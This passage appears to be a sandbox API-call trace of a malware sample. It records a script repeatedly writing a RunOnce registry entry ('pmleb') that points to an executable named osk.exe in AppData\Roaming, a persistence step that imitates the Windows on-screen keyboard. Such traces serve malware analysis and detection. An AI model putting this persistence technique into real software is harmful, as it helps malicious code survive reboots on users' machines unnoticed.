Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.314] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2e [0081.314] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.314] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2f [0081.314] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.315] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2e [0081.315] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.315] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.315] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.315] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.315] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.315] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.315] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.315] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.315] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.316] RegCloseKey (hKey=0x280) returned 0x0 [0081.316] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.316] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.316] SetTimer (hWnd=0x20280, nIDEvent=0x20aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x20aa [0081.316] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.328] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.328] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.328] KillTimer (hWnd=0x20280, uIDEvent=0x20aa) returned 1 [0081.329] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.329] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.329] IUnknown:Release (This=0x787518) returned 0x1 [0081.329] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.329] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.329] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.329] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.329] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2f [0081.329] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.330] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x30 [0081.330] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.330] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2f [0081.330] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.330] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.330] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.330] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.331] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.331] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.331] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.331] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.331] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.331] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.331] RegCloseKey (hKey=0x280) returned 0x0 [0081.331] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.331] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.331] SetTimer (hWnd=0x20280, nIDEvent=0x20ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ab [0081.331] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.344] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.344] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.344] KillTimer (hWnd=0x20280, uIDEvent=0x20ab) returned 1 [0081.344] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.344] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.344] IUnknown:Release (This=0x787518) returned 0x1 [0081.344] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.344] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.345] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.345] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.345] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x30 [0081.345] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.345] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x31 [0081.345] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.346] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x30 [0081.346] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.346] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.346] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.346] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.346] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.346] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.346] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.346] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.346] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.347] RegCloseKey (hKey=0x280) returned 0x0 [0081.347] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.347] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.347] SetTimer (hWnd=0x20280, nIDEvent=0x20ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ac [0081.347] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.360] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.360] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.361] KillTimer (hWnd=0x20280, uIDEvent=0x20ac) returned 1 [0081.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.361] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.361] IUnknown:Release (This=0x787518) returned 0x1 [0081.361] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.361] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.361] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.361] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 